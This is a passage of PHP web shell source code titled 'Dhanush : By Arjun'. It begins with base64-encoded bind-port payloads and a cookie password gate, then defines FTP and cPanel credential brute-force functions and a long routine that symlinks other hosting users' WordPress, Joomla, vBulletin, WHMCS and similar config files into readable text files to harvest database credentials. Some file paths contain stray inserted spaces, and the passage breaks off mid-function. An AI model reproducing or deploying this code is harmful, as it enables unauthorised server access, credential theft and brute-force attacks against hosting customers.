JZSvFGcI1cB6NlYexIUWSMEs0ED2+Cv2Q1oThS6xvBe8Qi6GXsC5ayml2RQW9miCM4Ebcsy0i422iCZ1asMPRJhm04GfYPYa/RbMNHxlNxreB0BK8aLb805JEZoD9plJshn+l5vD48J10vZbzeqFoqcsJ4K34+0GZEa/ahyEWKcWu/JpEoweO9mpn7nOl4iDxd5er/quvHqyQieEiqtLCBJLOcRMBFQAmdlze0FPwfpW2emBWnLVRl5u69l/b3/hs=";
   5 $bind_port_c = "bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP";
   6 $bind_port_p = "bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
   7 if (isset($_COOKIE['hacked']) && $_COOKIE['hacked'] == md5($pass)) {
   8 ?>
   9 <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> 
  10 <title>Dhanush : By Arjun</title>
  11 <script type="text/javascript">
  12 checked = false;
  13 function checkedAll () 
  14 {
  15     if (checked == false){checked = true}else{checked = false}
  16    for (var i = 0; i < document.getElementById('myform').elements.length; i++) 
  17    {
  18      document.getElementById('myform').elements[i].checked = checked;
  19    }
  20 }
  21 </script>
  22 
  23 <body>
  24 <?php
  25     $self = $_SERVER["PHP_SELF"];
  26     $os = "N/D";
  27     if (stristr(php_uname(), "Windows")) {
  28         $SEPARATOR = '\';
  29           $os = "Windows";
  30           $directorysperator="\";
  31           
  32   }
  33   else if(stristr(php_uname(),"Linux"))
  34   {
  35           $os = "Linux";
  36           $directorysperator=' / ';
  37           
  38   }
  39   function Trail($d,$directsperator)
  40   {
  41       $d=explode($directsperator,$d);
  42       array_pop($d);
  43       array_pop($d);
  44       $str=implode($d,$directsperator);
  45       return $str;
  46   }
  47   
  48   function ftp_check($host,$user,$pass,$timeout)
  49   {
  50    $ch = curl_init();
  51    curl_setopt($ch, CURLOPT_URL, "ftp://$host");
  52    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  53    curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  54    curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
  55    curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  56    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  57    curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  58    $data = curl_exec($ch);
  59    if ( curl_errno($ch) == 28 )
  60    {
  61    print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
  62    <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout
  63    Please Check The Target Hostname .</font></font></b></p>";exit;
  64    }
  65    else if ( curl_errno($ch) == 0 )
  66    {
  67     print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Tahoma\"   style=\"font-size: 9pt\"><b><font color=\"#008000\">
  68    Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
  69    and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
  70    }
  71    curl_close($ch);
  72   }
  73   
  74   function cpanel_check($host,$user,$pass,$timeout)
  75   {
  76    global $cpanel_port;
  77    $ch = curl_init();
  78    //echo "http://$host:".$cpanel_port."<br>";
  79    curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
  80    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  81    curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  82    curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  83    curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  84    curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  85    $data = curl_exec($ch);
  86    if ( curl_errno($ch) == 28 )
  87    { print "<b><font face=\"Verdana\" style=\"font-size: 9pt\">
  88     <font color=\"#AA0000\">Error :</font> <font color=\"#008000\">Connection Timeout
  89     Please Check The Target Hostname .</font></font></b></p>";exit;}
  90     else if ( curl_errno($ch) == 0 ){
  91     print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"#008000\">[~]</font></b><font face=\"Tahoma\"   style=\"font-size: 9pt\"><b><font color=\"#008000\">
  92    Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\"
  93   and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
  94    }
  95    curl_close($ch);
  96   }
  97   
  98   function syml($usern,$pdomain)
  99   {
 100       symlink(' / home / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 101       symlink(' / home / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 102       symlink(' / home / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 103       symlink(' / home / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 104       symlink(' / home / '.$usern.' / public_html / inc / config . php',$pdomain.' ~ ~mybb . txt');
 105       symlink(' / home / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 106       symlink(' / home / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 107       symlink(' / home / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 108       symlink(' / home / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 109       symlink(' / home / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 110       symlink(' / home / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 111       symlink(' / home / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 112       symlink(' / home / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 113       symlink(' / home / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 114       symlink(' / home / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 115       symlink(' / home / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 116       symlink(' / home / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 117       symlink(' / home / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 118       symlink(' / home / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 119       symlink(' / home / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 120       symlink(' / home / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 121       symlink(' / home / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 122       symlink(' / home / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 123       symlink(' / home / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 124       symlink(' / home / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 125       symlink(' / home / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 126       symlink(' / home / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 127       symlink(' / home / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 128       symlink(' / home / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 129       symlink(' / home / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 130       symlink(' / home / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 131       symlink(' / home2 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 132       symlink(' / home2 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 133       symlink(' / home2 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 134       symlink(' / home2 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 135       symlink(' / home2 / '.$usern.' / public_html / inc / config . php',$pdomain.' ~ ~mybb . txt');
 136       symlink(' / home2 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 137       symlink(' / home2 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 138       symlink(' / home2 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 139       symlink(' / home2 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 140       symlink(' / home2 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 141       symlink(' / home2 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 142       symlink(' / home2 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 143       symlink(' / home2 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 144       symlink(' / home2 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 145       symlink(' / home2 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 146       symlink(' / home2 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 147       symlink(' / home2 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 148       symlink(' / home2 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 149       symlink(' / home2 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 150       symlink(' / home2 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 151       symlink(' / home2 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 152       symlink(' / home2 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 153       symlink(' / home2 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 154       symlink(' / home2 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 155       symlink(' / home2 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 156       symlink(' / home2 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 157       symlink(' / home2 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 158       symlink(' / home2 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 159       symlink(' / home2 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 160       symlink(' / home2 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 161       symlink(' / home2 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 162       symlink(' / home3 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 163       symlink(' / home3 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 164       symlink(' / home3 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 165       symlink(' / home3 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 166       symlink(' / home3 / '.$usern.' / public_html / inc / config . php',$pdomain.' ~ ~mybb . txt');
 167       symlink(' / home3 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 168       symlink(' / home3 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 169       symlink(' / home3 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 170       symlink(' / home3 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 171       symlink(' / home3 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 172       symlink(' / home3 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 173       symlink(' / home3 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 174       symlink(' / home3 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 175       symlink(' / home3 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 176       symlink(' / home3 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 177       symlink(' / home3 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 178       symlink(' / home3 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 179       symlink(' / home3 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 180       symlink(' / home3 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 181       symlink(' / home3 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 182       symlink(' / home3 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 183       symlink(' / home3 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 184       symlink(' / home3 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 185       symlink(' / home3 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 186       symlink(' / home3 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 187       symlink(' / home3 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 188       symlink(' / home3 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 189       symlink(' / home3 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 190       symlink(' / home3 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 191       symlink(' / home3 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 192       symlink(' / home3 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 193       symlink(' / home4 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 194       symlink(' / home4 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 195       symlink(' / home4 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 196       symlink(' / home4 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 197       symlink(' / home4 / '.$usern.' / public_html / inc / config . php',$pdomain.' ~ ~mybb . txt');
 198       symlink(' / home4 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 199       symlink(' / home4 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 200       symlink(' / home4 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 201       symlink(' / home4 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 202       symlink(' / home4 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 203       symlink(' / home4 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 204       symlink(' / home4 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 205       symlink(' / home4 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 206       symlink(' / home4 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 207       symlink(' / home4 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 208       symlink(' / home4 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 209       symlink(' / home4 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 210       symlink(' / home4 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 211       symlink(' / home4 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 212       symlink(' / home4 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 213       symlink(' / home4 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 214       symlink(' / home4 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 215       symlink(' / home4 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 216       symlink(' / home4 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 217       symlink(' / home4 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 218       symlink(' / home4 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 219       symlink(' / home4 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 220       symlink(' / home4 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 221       symlink(' / home4 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 222       symlink(' / home4 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 223       symlink(' / home4 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 224       symlink(' / home5 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 225       symlink(' / home5 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 226       symlink(' / home5 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 227       symlink(' / home5 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 228       symlink(' / home5 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 229       symlink(' / home5 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 230       symlink(' / home5 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 231       symlink(' / home5 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 232       symlink(' / home5 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 233       symlink(' / home5 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 234       symlink(' / home5 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 235       symlink(' / home5 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 236       symlink(' / home5 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 237       symlink(' / home5 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 238       symlink(' / home5 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 239       symlink(' / home5 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 240       symlink(' / home5 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 241       symlink(' / home5 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 242       symlink(' / home5 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 243       symlink(' / home5 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 244       symlink(' / home5 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 245       symlink(' / home5 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 246       symlink(' / home5 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 247       symlink(' / home5 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 248       symlink(' / home5 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 249       symlink(' / home5 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 250       symlink(' / home5 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 251       symlink(' / home5 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 252       symlink(' / home5 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 253       symlink(' / home5 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 254       symlink(' / home6 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 255       symlink(' / home6 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 256       symlink(' / home6 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 257       symlink(' / home6 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 258       symlink(' / home6 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 259       symlink(' / home6 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 260       symlink(' / home6 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 261       symlink(' / home6 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 262       symlink(' / home6 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 263       symlink(' / home6 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 264       symlink(' / home6 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 265       symlink(' / home6 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 266       symlink(' / home6 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 267       symlink(' / home6 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 268       symlink(' / home6 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 269       symlink(' / home6 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 270       symlink(' / home6 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 271       symlink(' / home6 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 272       symlink(' / home6 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 273       symlink(' / home6 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 274       symlink(' / home6 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 275       symlink(' / home6 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 276       symlink(' / home6 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 277       symlink(' / home6 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 278       symlink(' / home6 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 279       symlink(' / home6 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 280       symlink(' / home6 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 281       symlink(' / home6 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 282       symlink(' / home6 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 283       symlink(' / home6 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 284       symlink(' / home7 / '.$usern.' / public_html / vb / includes / config . php',$pdomain.' ~ ~vBulletin1 . txt');
 285       symlink(' / home7 / '.$usern.' / public_html / includes / config . php',$pdomain.' ~ ~vBulletin2 . txt');
 286       symlink(' / home7 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~vBulletin3 . txt');
 287       symlink(' / home7 / '.$usern.' / public_html / cc / includes / config . php',$pdomain.' ~ ~vBulletin4 . txt');
 288       symlink(' / home7 / '.$usern.' / public_html / config . php',$pdomain.' ~ ~Phpbb1 . txt');
 289       symlink(' / home7 / '.$usern.' / public_html / forum / includes / config . php',$pdomain.' ~ ~Phpbb2 . txt');
 290       symlink(' / home7 / '.$usern.' / public_html / wp - config . php',$pdomain.' ~ ~Wordpress1 . txt');
 291       symlink(' / home7 / '.$usern.' / public_html / blog / wp - config . php',$pdomain.' ~ ~Wordpress2 . txt');
 292       symlink(' / home7 / '.$usern.' / public_html / configuration . php',$pdomain.' ~ ~Joomla1 . txt');
 293       symlink(' / home7 / '.$usern.' / public_html / blog / configuration . php',$pdomain.' ~ ~Joomla2 . txt');
 294       symlink(' / home7 / '.$usern.' / public_html / joomla / configuration . php',$pdomain.' ~ ~Joomla3 . txt');
 295       symlink(' / home7 / '.$usern.' / public_html / whm / configuration . php',$pdomain.' ~ ~Whm1 . txt');
 296       symlink(' / home7 / '.$usern.' / public_html / whmc / configuration . php',$pdomain.' ~ ~Whm2 . txt');
 297       symlink(' / home7 / '.$usern.' / public_html / support / configuration . php',$pdomain.' ~ ~Whm3 . txt');
 298       symlink(' / home7 / '.$usern.' / public_html / client / configuration . php',$pdomain.' ~ ~Whm4 . txt');
 299       symlink(' / home7 / '.$usern.' / public_html / billings / configuration . php',$pdomain.' ~ ~Whm5 . txt');
 300       symlink(' / home7 / '.$usern.' / public_html / billing / configuration . php',$pdomain.' ~ ~Whm6 . txt');
 301       symlink(' / home7 / '.$usern.' / public_html / clients / configuration . php',$pdomain.' ~ ~Whm7 . txt');
 302       symlink(' / home7 / '.$usern.' / public_html / whmcs / configuration . php',$pdomain.' ~ ~Whm8 . txt');
 303       symlink(' / home7 / '.$usern.' / public_html / order / configuration . php',$pdomain.' ~ ~Whm9 . txt');
 304       symlink(' / home7 / '.$usern.' / public_html / admin / conf . php',$pdomain.' ~ ~5.txt');
 305       symlink(' / home7 / '.$usern.' / public_html / admin / config . php',$pdomain.' ~ ~4.txt');
 306       symlink(' / home7 / '.$usern.' / public_html / conf_global . php',$pdomain.' ~ ~invisio . txt');
 307       symlink(' / home7 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~7.txt');
 308       symlink(' / home7 / '.$usern.' / public_html / connect . php',$pdomain.' ~ ~8.txt');
 309       symlink(' / home7 / '.$usern.' / public_html / mk_conf . php',$pdomain.' ~ ~mk - portale1 . txt');
 310       symlink(' / home7 / '.$usern.' / public_html / include / config . php',$pdomain.' ~ ~12.txt');
 311       symlink(' / home7 / '.$usern.' / public_html / settings . php',$pdomain.' ~ ~Smf . txt');
 312       symlink(' / home7 / '.$usern.' / public_html / includes / functions . php',$pdomain.' ~ ~phpbb3 . txt');
 313       symlink(' / home7 / '.$usern.' / public_html / include / db . php',$pdomain.' ~ ~infinity . txt');
 314   }
 315   
 316   function randomt() 
 317   { 
 318       $chars = "abcdefghijkmnopqrstuvwxyz023456789"; 
 319       srand((double)microtime()*1000000); 
 320       $i = 0; 
 321       $pass = '' ; 
 322           
 323       while ($i <= 7) 
